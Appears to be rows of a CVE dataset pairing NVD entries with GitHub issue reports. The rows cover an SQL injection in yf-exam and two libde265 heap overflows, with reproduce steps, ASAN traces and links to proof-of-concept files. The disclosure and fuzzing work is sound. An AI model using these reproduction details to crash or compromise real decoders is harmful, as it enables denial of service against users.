cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
โŒ€
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
โŒ€
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2023-26780
2023-03-02T16:15:14.857
CleverStupidDog yf-exam v 1.8.0 is vulnerable to SQL Injection.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CleverStupidDog/yf-exam/issues/4" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Fw-fW-fw/UPDATE-CVE/blob/main/CVE-2023-26780" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CleverStupidDog/yf-exam/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Fw-fW-fw/UPDATE-CVE/blob/main/CVE-2023-26780" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yf-exam_project:yf-exam:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "13CA9681-5722-40F8-8836-EB0BFED22182", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CleverStupidDog/yf-exam/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CleverStupidDog", "yf-exam" ]
**describe** Yunfan training and examination system is a multi-role online training and examination system. The system integrates user management, role management, department management, question bank management, test question management, test question import and export, test management, online test, wrong question Training and other functions, the examination process is perfect. Yunfan Training Examv1.8.0The parameters passed in are not filtered, resulting insqlInject. **Vulnerability details** ![image](https://user-images.githubusercontent.com/66824584/217629784-33f30581-76c4-4b7e-83e5-88677f944e25.png) ![image](https://user-images.githubusercontent.com/66824584/217629864-1bb0732d-3bb0-4f74-8937-f47b0d2e4cd8.png) ![image](https://user-images.githubusercontent.com/66824584/217629904-26aa291b-eda7-4e5c-af7e-6768de518092.png) ![image](https://user-images.githubusercontent.com/66824584/217629929-ea51fd23-2329-4503-a020-0d249ed9fd25.png) ![image](https://user-images.githubusercontent.com/66824584/217629961-d19b069f-c4e4-43b7-aaf7-d57143270a35.png) ![image](https://user-images.githubusercontent.com/66824584/217629996-8a646b9c-d239-4dcc-af8a-573aa4eaf499.png) ![image](https://user-images.githubusercontent.com/66824584/217630033-b214ef75-deec-4ac1-9850-86663fef79ff.png) ![image](https://user-images.githubusercontent.com/66824584/217630202-f5afcad5-c2fb-45f3-8cbb-6eda81b3e4ea.png) ![image](https://user-images.githubusercontent.com/66824584/217630272-5ac3a20d-29c2-4546-a018-d46c1c3034c1.png) ![image](https://user-images.githubusercontent.com/66824584/217630302-afc0228d-0e7d-4560-bd2c-ce40ad678d49.png) ![image](https://user-images.githubusercontent.com/66824584/217630418-546eea2b-c5fa-4630-9a9a-dcf3c9d3f9e1.png) ![image](https://user-images.githubusercontent.com/66824584/217630507-a7027614-11ef-4bee-a964-c404123ab614.png) ![image](https://user-images.githubusercontent.com/66824584/217630567-85ae0d19-992b-4475-8274-a0dfe05ec54b.png) ![image](https://user-images.githubusercontent.com/66824584/217630616-f8cedb78-6cec-43db-9bdb-9502d2ac52d4.png) ![image](https://user-images.githubusercontent.com/66824584/217630636-d3906fba-9b21-40b1-bf57-c938259af6b6.png) ![image](https://user-images.githubusercontent.com/66824584/217630661-946e14b7-8705-44ed-8717-0d5d4f2342d2.png) ![image](https://user-images.githubusercontent.com/66824584/217630773-25e992c4-8695-464e-8f66-002ac694ec1c.png) ![image](https://user-images.githubusercontent.com/66824584/217630822-68250367-810c-49d5-89be-1f4bc87b3082.png) ![image](https://user-images.githubusercontent.com/66824584/217630927-78d3415a-c997-4d23-89bd-85ddf87c75c2.png) ![image](https://user-images.githubusercontent.com/66824584/217630893-8db2bc46-c928-419d-8d8d-f511e6c2ca51.png) ![image](https://user-images.githubusercontent.com/66824584/217630961-61399464-3489-4658-b132-4fafb7ef0618.png) ![image](https://user-images.githubusercontent.com/66824584/217630996-5a13bcad-3487-493d-a7a0-1f4498cfc004.png) ![image](https://user-images.githubusercontent.com/66824584/217631017-d70b2c3f-e5e9-4e5e-a0c8-21874e71d0e7.png) ![image](https://user-images.githubusercontent.com/66824584/217631114-2a110ea8-f524-4efb-ab22-b5848cee9bcd.png) ![image](https://user-images.githubusercontent.com/66824584/217631164-5cdb047a-ee18-447d-aef4-e0b37a97e545.png) ![image](https://user-images.githubusercontent.com/66824584/217631199-a4f38779-0664-47b8-a87d-64dd813482e4.png) ![image](https://user-images.githubusercontent.com/66824584/217631238-9862ed2c-2314-44b9-a7a4-1a271fca7b69.png) ![image](https://user-images.githubusercontent.com/66824584/217631257-34a6ddde-3640-4338-a305-91a03ac6b996.png) ![image](https://user-images.githubusercontent.com/66824584/217631296-05edd35f-0045-42f4-ad08-0922c53b2b14.png) ![image](https://user-images.githubusercontent.com/66824584/217631332-83855b9d-0056-4556-a0ef-3ed0fdbc45e4.png) ![image](https://user-images.githubusercontent.com/66824584/217631381-12fd22ec-5752-4b7f-bf17-fdc1439ab7a4.png) ![image](https://user-images.githubusercontent.com/66824584/217631409-1ed50651-e6f9-4c3a-859e-30c37a4fb239.png) ![image](https://user-images.githubusercontent.com/66824584/217631442-9bfb5610-cb00-4c86-ad1a-022814f877a3.png) ![image](https://user-images.githubusercontent.com/66824584/217631482-ba9bb228-db6c-4923-82f9-a1f7bd65ab62.png) ![image](https://user-images.githubusercontent.com/66824584/217631523-ac7ca98b-bfe7-4ce7-8ec5-46d58977849a.png) ![image](https://user-images.githubusercontent.com/66824584/217631553-eec9b857-1325-45d5-88d8-a0d06c9b9434.png) ![image](https://user-images.githubusercontent.com/66824584/217631607-5c869913-c239-4a93-bc01-f4cb9cdd35b7.png) ![image](https://user-images.githubusercontent.com/66824584/217631745-9e7b140b-e602-4274-8890-9062bd85d1d6.png) ![image](https://user-images.githubusercontent.com/66824584/217631764-f29c4f87-7685-4cca-95f8-08dac58614ee.png) ![image](https://user-images.githubusercontent.com/66824584/217631793-20b663f9-440b-42f2-8952-fb37d9ca65d5.png) ![image](https://user-images.githubusercontent.com/66824584/217631839-31364090-7d8f-4ec8-ba2e-6f31e3fc506d.png) ![image](https://user-images.githubusercontent.com/66824584/217631879-523e9db1-6bc3-43a3-b8f4-0fe5b1cf2a7a.png)
sql injection vulnerability
https://api.github.com/repos/CleverStupidDog/yf-exam/issues/4/comments
0
2023-02-08T19:28:49Z
2023-02-24T08:32:47Z
https://github.com/CleverStupidDog/yf-exam/issues/4
1,576,687,423
4
4,788
CVE-2022-47664
2023-03-03T15:15:10.887
Libde265 1.0.9 is vulnerable to Buffer Overflow in ff_hevc_put_hevc_qpel_pixels_8_sse
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/strukturag/libde265/issues/368" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/strukturag/libde265/issues/368" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "8186C657-3009-4756-B2AC-531BD7926074", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/strukturag/libde265/issues/368
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "strukturag", "libde265" ]
# Description heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) # Version info ``` dec265 v1.0.9 -------------- usage: dec265 [options] videofile.bin The video file must be a raw bitstream, or a stream with NAL units (option -n). options: -q, --quiet do not show decoded image -t, --threads N set number of worker threads (0 - no threading) -c, --check-hash perform hash check -n, --nal input is a stream with 4-byte length prefixed NAL units -f, --frames N set number of frames to process -o, --output write YUV reconstruction -d, --dump dump headers -0, --noaccel do not use any accelerated code (SSE) -v, --verbose increase verbosity level (up to 3 times) -L, --no-logging disable logging -B, --write-bytestream FILENAME write raw bytestream (from NAL input) -m, --measure YUV compute PSNRs relative to reference YUV -T, --highest-TID select highest temporal sublayer to decode --disable-deblocking disable deblocking filter --disable-sao disable sample-adaptive offset filter -h, --help show help ``` # Reproduce ``` git clone https://github.com/strukturag/libde265.git cd libde265 mkdir build cd build cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address" make -j$(nproc) ./dec265/dec265 653.bin ``` # ASAN ``` WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: non-existing PPS referenced WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: CTB outside of image area (concealing stream error...) WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: non-existing PPS referenced WARNING: CTB outside of image area (concealing stream error...) WARNING: non-existing PPS referenced WARNING: non-existing PPS referenced WARNING: CTB outside of image area (concealing stream error...) WARNING: maximum number of reference pictures exceeded ================================================================= ==733371==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00000d190 at pc 0x7f929c8bfbbc bp 0x7ffcdcf97080 sp 0x7ffcdcf97070 READ of size 16 at 0x61b00000d190 thread T0 #0 0x7f929c8bfbbb in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x2b6bbb) #1 0x7f929c7b249f in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a949f) #2 0x7f929c7b35a7 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aa5a7) #3 0x7f929c7a4a8b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x19ba8b) #4 0x7f929c7b1a2e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a8a2e) #5 0x7f929c7ef80b in read_coding_unit(thread_context*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e680b) #6 0x7f929c7f1762 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8762) #7 0x7f929c7f1675 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8675) #8 0x7f929c7f1610 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8610) #9 0x7f929c7f15a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3) #10 0x7f929c7e8d49 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfd49) #11 0x7f929c7f1f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06) #12 0x7f929c7f3c3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f) #13 0x7f929c746e6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f) #14 0x7f929c747673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673) #15 0x7f929c746311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311) #16 0x7f929c74605b in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d05b) #17 0x7f929c748be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6) #18 0x7f929c74924c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c) #19 0x7f929c72f3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2) #20 0x5613fc1319a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5) #21 0x7f929c0d7d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #22 0x7f929c0d7e3f in __libc_start_main_impl ../csu/libc-start.c:392 #23 0x5613fc12f7c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4) 0x61b00000d190 is located 0 bytes to the right of 1552-byte region [0x61b00000cb80,0x61b00000d190) allocated by thread T0 here: #0 0x7f929ca5755c in __interceptor_posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:226 #1 0x7f929c78aa61 in ALLOC_ALIGNED(unsigned long, unsigned long) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x181a61) #2 0x7f929c78b202 in de265_image_get_buffer(void*, de265_image_spec*, de265_image*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x182202) #3 0x7f929c78d66b in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x18466b) #4 0x7f929c7709fa in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1679fa) #5 0x7f929c749fd4 in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x140fd4) #6 0x7f929c74cee1 in decoder_context::process_reference_picture_set(slice_segment_header*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x143ee1) #7 0x7f929c75046a in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14746a) #8 0x7f929c745970 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13c970) #9 0x7f929c748be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6) #10 0x7f929c74924c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c) #11 0x7f929c72f3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2) #12 0x5613fc1319a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5) #13 0x7f929c0d7d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) Shadow bytes around the buggy address: 0x0c367fff99e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff99f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff9a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff9a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff9a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c367fff9a30: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff9a40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff9a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff9a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff9a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff9a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==733371==ABORTING ``` # POC [660.zip](https://github.com/strukturag/libde265/files/10253597/660.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*)
https://api.github.com/repos/strukturag/libde265/issues/368/comments
7
2022-12-18T10:37:01Z
2023-03-06T17:51:27Z
https://github.com/strukturag/libde265/issues/368
1,501,854,902
368
4,789
CVE-2022-47665
2023-03-03T15:15:10.960
Libde265 1.0.9 has a heap buffer overflow vulnerability in de265_image::set_SliceAddrRS(int, int, int)
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/strukturag/libde265/issues/369" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/strukturag/libde265/issues/369" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "8186C657-3009-4756-B2AC-531BD7926074", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/369
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "strukturag", "libde265" ]
# Description heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int) # Version info ``` dec265 v1.0.9 -------------- usage: dec265 [options] videofile.bin The video file must be a raw bitstream, or a stream with NAL units (option -n). options: -q, --quiet do not show decoded image -t, --threads N set number of worker threads (0 - no threading) -c, --check-hash perform hash check -n, --nal input is a stream with 4-byte length prefixed NAL units -f, --frames N set number of frames to process -o, --output write YUV reconstruction -d, --dump dump headers -0, --noaccel do not use any accelerated code (SSE) -v, --verbose increase verbosity level (up to 3 times) -L, --no-logging disable logging -B, --write-bytestream FILENAME write raw bytestream (from NAL input) -m, --measure YUV compute PSNRs relative to reference YUV -T, --highest-TID select highest temporal sublayer to decode --disable-deblocking disable deblocking filter --disable-sao disable sample-adaptive offset filter -h, --help show help ``` # Reproduce ``` git clone https://github.com/strukturag/libde265.git cd libde265 mkdir build cd build cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address" make -j$(nproc) ./dec265/dec265 653.bin ``` # ASAN ``` WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: maximum number of reference pictures exceeded WARNING: CTB outside of image area (concealing stream error...) WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list SPS error: TB > CB WARNING: CTB outside of image area (concealing stream error...) WARNING: CTB outside of image area (concealing stream error...) WARNING: CTB outside of image area (concealing stream error...) WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: CTB outside of image area (concealing stream error...) WARNING: maximum number of reference pictures exceeded WARNING: CTB outside of image area (concealing stream error...) ================================================================= ==732766==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000007d8 at pc 0x7ff23d2ac50e bp 0x7ffce559d1f0 sp 0x7ffce559d1e0 WRITE of size 2 at 0x6070000007d8 thread T0 #0 0x7ff23d2ac50d in de265_image::set_SliceAddrRS(int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1ec50d) #1 0x7ff23d29fb85 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfb85) #2 0x7ff23d2a8f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06) #3 0x7ff23d2aac3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f) #4 0x7ff23d1fde6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f) #5 0x7ff23d1fe673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673) #6 0x7ff23d1fd311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311) #7 0x7ff23d200345 in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x140345) #8 0x7ff23d1e63f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2) #9 0x564bf4c049a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5) #10 0x7ff23cb8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #11 0x7ff23cb8ee3f in __libc_start_main_impl ../csu/libc-start.c:392 #12 0x564bf4c027c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4) 0x6070000007d8 is located 0 bytes to the right of 72-byte region [0x607000000790,0x6070000007d8) allocated by thread T0 here: #0 0x7ff23d50d867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 #1 0x7ff23d2490b4 in MetaDataArray<CTB_info>::alloc(int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1890b4) #2 0x7ff23d245381 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x185381) #3 0x7ff23d2279fa in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1679fa) #4 0x7ff23d206b0d in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x146b0d) #5 0x7ff23d1fc970 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13c970) #6 0x7ff23d1ffbe6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6) #7 0x7ff23d20024c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c) #8 0x7ff23d1e63f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2) #9 0x564bf4c049a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5) #10 0x7ff23cb8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 SUMMARY: AddressSanitizer: heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int) Shadow bytes around the buggy address: 0x0c0e7fff80a0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0e7fff80b0: 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 0x0c0e7fff80c0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0e7fff80d0: 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 00 fa 0x0c0e7fff80e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa =>0x0c0e7fff80f0: fa fa 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa 0x0c0e7fff8100: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 0x0c0e7fff8110: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0e7fff8120: 00 00 00 00 04 fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==732766==ABORTING ``` # POC [653.zip](https://github.com/strukturag/libde265/files/10253589/653.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int)
